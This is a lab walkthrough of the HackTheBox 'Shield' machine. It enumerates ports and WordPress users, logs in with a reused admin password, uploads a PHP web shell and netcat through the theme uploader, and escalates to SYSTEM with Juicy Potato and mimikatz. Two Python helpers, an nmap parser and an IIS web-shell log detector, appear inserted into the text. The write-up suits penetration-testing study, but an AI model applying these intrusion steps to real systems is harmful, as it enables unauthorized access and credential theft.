As I mentioned before, the Starting Point machines are a series of 9 easy-rated machines that should be rooted in sequence. So if you want to go through this box, you must first have completed the Vaccine machine.
Enough talk, 🥱 Let's Get It Started 🐱💻
Disclaimer: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags yourself! 🐱👤
00. Start Machine …
To start the machine, just click "Join Machine".
Then you can see the IP address for that machine. Usually it is 10.10.10.29 🤠
Before going into the enumeration steps we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall might "disable" ping requests from passing through, but in most cases the ping will succeed! 🙂
The full TCP port scan is nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29, with these options:
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Show only open (or possibly open) ports
-p- : Full TCP port range (1-65535)
-T4 : Aggressive (4) timing template; assumes you are on a reasonably fast and reliable network
-oN AllPorts.nmap : Save the output in normal format to AllPorts.nmap
Here is the output 👇
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 09:11 EDT
Initiating Ping Scan at 09:11
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 09:11, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:11
Scanning 10.10.10.29 [65535 ports]
Discovered open port 3306/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
SYN Stealth Scan Timing: About 6.12% done; ETC: 09:19 (0:07:56 remaining)
SYN Stealth Scan Timing: About 14.99% done; ETC: 09:18 (0:05:46 remaining)
SYN Stealth Scan Timing: About 24.54% done; ETC: 09:17 (0:04:40 remaining)
SYN Stealth Scan Timing: About 32.52% done; ETC: 09:17 (0:04:11 remaining)
SYN Stealth Scan Timing: About 39.61% done; ETC: 09:17 (0:03:50 remaining)
SYN Stealth Scan Timing: About 53.18% done; ETC: 09:17 (0:02:39 remaining)
SYN Stealth Scan Timing: About 70.11% done; ETC: 09:16 (0:01:30 remaining)
Completed SYN Stealth Scan at 09:15, 253.94s elapsed (65535 total ports)
Nmap scan report for 10.10.10.29
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2021-05-20 09:11:32 EDT for 254s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
3306/tcp open  mysql   syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 254.38 seconds
           Raw packets sent: 131239 (5.774MB) | Rcvd: 170 (7.464KB)
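The two-stage scan above (full port sweep first, then a targeted -sV -sC run against only the open ports) is easy to script. This is an added example, not part of the original writeup: it parses nmap's normal (-oN) output format, generalised to any number of hosts, and builds the comma-separated port list for the follow-up scan. The sample output embedded below is constructed to mirror the scan on this page.

```python
import re

# Constructed excerpt of nmap -oN output (sample input, modelled on the scan above).
SAMPLE_NMAP = """\
# Nmap 7.91 scan initiated Thu May 20 09:11:32 2021 as: nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received echo-reply ttl 127 (0.22s latency).
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
3306/tcp open  mysql   syn-ack ttl 127

# Nmap done at Thu May 20 09:15:46 2021 -- 1 IP address (1 host up) scanned in 254.38 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# port/proto  state  service  reason (reason column only appears with -v/-vv)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service, reason), ...]} from -oN text."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                       # a new "scan report" block starts a new host
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current:           # header line "PORT STATE ..." does not match (no digits)
            port, proto, state, service, reason = m.groups()
            hosts[current].append((int(port), proto, state, service, reason.strip()))
    return hosts


def open_ports(hosts, host):
    """Only ports nmap reported as open (ignore open|filtered etc.)."""
    return [p for p, _, state, _, _ in hosts.get(host, []) if state == "open"]


def nse_port_list(hosts, host):
    """Build the -p argument for the targeted -sV -sC follow-up scan, e.g. '80,3306'."""
    return ",".join(str(p) for p in open_ports(hosts, host))


if __name__ == "__main__":
    parsed = parse_nmap_normal(SAMPLE_NMAP)
    print(parsed)
    print("nmap -sV -sC -p", nse_port_list(parsed, "10.10.10.29"), "10.10.10.29")
```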
Really? There are only two ports open. 😑😑😶
01.2 Run Nmap Scripting Engine
To get the best results, we can run the Nmap Scripting Engine (-sC) together with version detection (-sV) against the open ports. Now that we know all of the open ports, we can point the script engine at just those and get results as fast as possible.
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80,3306 10.10.10.29
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 09:27 EDT
Nmap scan report for 10.10.10.29
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
There are 2 open ports. One is running a web server (Microsoft IIS 10.0) and the other one is running a MySQL server. 🤷♂️🤷♂️
01.3 Discover more on port 80
🕵️♀️ Now we have only two open ports, so I chose port 80 first. You already have a pretty good idea about what we need to do with port 80, right? Let's open our web browser, type 10.10.10.29 and then hit enter.
What the hell! Feels like there are more steps. 😖 Now we need to find out whether there are any other directories here.
Again it's time to start fuzzing. I have already told you how to use the dirsearch tool in the Oopsie walkthrough. Now it's time to learn a new cool tool. 😍😎 The tool is ffuf, a fast web fuzzer written in Go.
You can download and install this tool by reading this. It should be installed on your OS if you are planning to face the OSCP, because it helps a lot more than the ordinary Wfuzz tool.
So we have only one directory and it is wordpress. Let's jump to our web browser and navigate to http://10.10.10.29/wordpress
Now you can see there is a WordPress site hosted on the server. So now it's time to use the wpscan tool. With this tool we can do lots of things on the WordPress CMS, like enumerating plugins, users, themes and backups, and we can also use it to brute force WordPress passwords.
wpscan --url http://10.10.10.29/wordpress -e u
Here is the output. 👇👇
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# wpscan --url http://10.10.10.29/wordpress -e u
_______________________________________________________________
[WPScan ASCII banner]
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Thu May 20 10:33:23 2021

<snip> ............ </snip>

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May 20 10:33:31 2021
[+] Requests Done: 13
[+] Cached Requests: 42
[+] Data Sent: 3.559 KB
[+] Data Received: 9.893 KB
[+] Memory used: 122.016 MB
[+] Elapsed time: 00:00:08
So as you can see there is only one user, called admin, on this WordPress site. We could brute force that user with the rockyou wordlist.
Password brute forcing is quite time consuming here, though. Since these boxes are in sequence, we can check the previously found credentials instead. 🙄🙄 In the Vaccine walkthrough we found some passwords; if you try them one by one you will get the right one. Here it is: P@s5w0rd! So the credentials for the WordPress login are
admin : P@s5w0rd!
And if you are not familiar with WordPress sites, /wp-admin is the login page for most WordPress sites and it is the default login path. bla bla bla...
Anyway, go to your browser again and navigate to http://10.10.10.29/wordpress/wp-admin . Now you end up at the login page.
Now you can enter the above credentials ☝☝ and hit enter. You are successfully logged in to the WordPress site as admin. 👑👑
02. Foothold
Now it's time to upload a reverse shell. But keep in mind that you are on a Windows machine, so you must have a Windows PHP reverse shell to gain access. Let's upload a bind shell first. You can download it from here. We also need the netcat binary to get a reverse shell. You can download it from here. 😊😊
By looking at the dashboard settings, it's obvious that we have the option to upload media, themes, pages, etc. I'll start from the themes to see what we can do.
Then click the "Add New" button.
Browse and upload both the netcat binary and the bind shell PHP script.
Click the "Install Now" button to upload. When you upload the files, you might get an error like this. It's fine to ignore this error. 😉😉
Then navigate to http://10.10.10.29/wordpress/wp-content/Uploads/simple-backdoor.php?cmd=dir
As you can see, we now have a simple bind shell. Let's gain a reverse shell from it with the help of our netcat binary. First, power up a netcat listener, then navigate to the following URL (change <YourIP> and <PORT> to yours). %20 is the URL encoding of a space. 😋😋
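From the defender's side, both the wpscan user enumeration above (the wp-json users endpoint and ?author=N probing) and the PHP web shell that was dropped into wp-content/uploads leave a clear trail in the IIS request log. This is an added example, not part of the original writeup: a small triage script over constructed IIS W3C log lines (the field layout, IPs and paths are assumptions modelled on this box) that flags those patterns and decodes the %20-encoded cmd= argument.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log sample (not real log data from the box).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-05-20 14:33:23 10.10.10.29 GET /wordpress/index.php/wp-json/wp/v2/users/ per_page=100&page=1 80 - 10.10.14.5 WPScan/3.8.14 200
2021-05-20 14:33:25 10.10.10.29 GET /wordpress/ author=1 80 - 10.10.14.5 WPScan/3.8.14 301
2021-05-20 14:40:01 10.10.10.29 GET /wordpress/ - 80 - 10.10.14.9 Mozilla/5.0 200
2021-05-20 14:52:10 10.10.10.29 POST /wordpress/wp-admin/update.php action=upload-theme 80 admin 10.10.14.5 Mozilla/5.0 200
2021-05-20 14:53:02 10.10.10.29 GET /wordpress/wp-content/Uploads/simple-backdoor.php cmd=dir 80 - 10.10.14.5 Mozilla/5.0 200
2021-05-20 14:54:40 10.10.10.29 GET /wordpress/wp-content/uploads/simple-backdoor.php cmd=dir%20C:%5C 80 - 10.10.14.5 Mozilla/5.0 200
"""

# IIS paths are case-insensitive (the writeup's URL used /Uploads/), hence re.I everywhere.
WP_USERS_API_RE = re.compile(r"/wp-json/wp/v2/users", re.I)
AUTHOR_PROBE_RE = re.compile(r"(^|&)author=\d+", re.I)
PHP_IN_UPLOADS_RE = re.compile(r"/wp-content/uploads/.*\.php$", re.I)
CMD_PARAM_RE = re.compile(r"(^|&)cmd=([^&]*)", re.I)


def parse_iis(text):
    """Turn W3C extended log text into a list of {field: value} dicts."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def triage(rows):
    """Return (source_ip, finding, detail) tuples for the patterns seen in this box."""
    findings = []
    for r in rows:
        stem, query, src = r["cs-uri-stem"], r["cs-uri-query"], r["c-ip"]
        if WP_USERS_API_RE.search(stem) or AUTHOR_PROBE_RE.search(query):
            findings.append((src, "wp-user-enumeration", stem))
        if PHP_IN_UPLOADS_RE.search(stem):           # PHP should never execute from uploads
            m = CMD_PARAM_RE.search(query)
            detail = unquote(m.group(2)) if m else "php-in-uploads"
            findings.append((src, "webshell-in-uploads", detail))
        if r["cs-method"] == "POST" and "upload-theme" in query:
            findings.append((src, "theme-upload-by-" + r["cs-username"], stem))
    return findings


def analyze_sample():
    return triage(parse_iis(SAMPLE_LOG))
```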
Woooh!! We have SeImpersonatePrivilege enabled. 🤩🤩 You know what that means: we can run Juicy Potato to escalate privileges. 🥔🥔 Let's do it..
Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (the highest privileges) by leveraging BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack.
Download the JuicyPotato binary and rename it to another file name, because sometimes Windows Defender will hate us. Then we need to upload it to the box. To do so, power up a Python web server on your machine.
Change YourIP and YourPort to yours. After creating the batch file, view it with the type command to verify.
Then everything is fine. Now it's time to exploit. Let's power up the netcat listener again and execute the following command. If you fail to get a reverse shell, change the -c parameter (the CLSID) using this document and run it again. 😎
Now we are at NT AUTHORITY\SYSTEM level. So let's upload mimikatz and see what we can pull. Mimikatz can be used to dump cached passwords. Download the mimikatz tool from here and upload it to the box.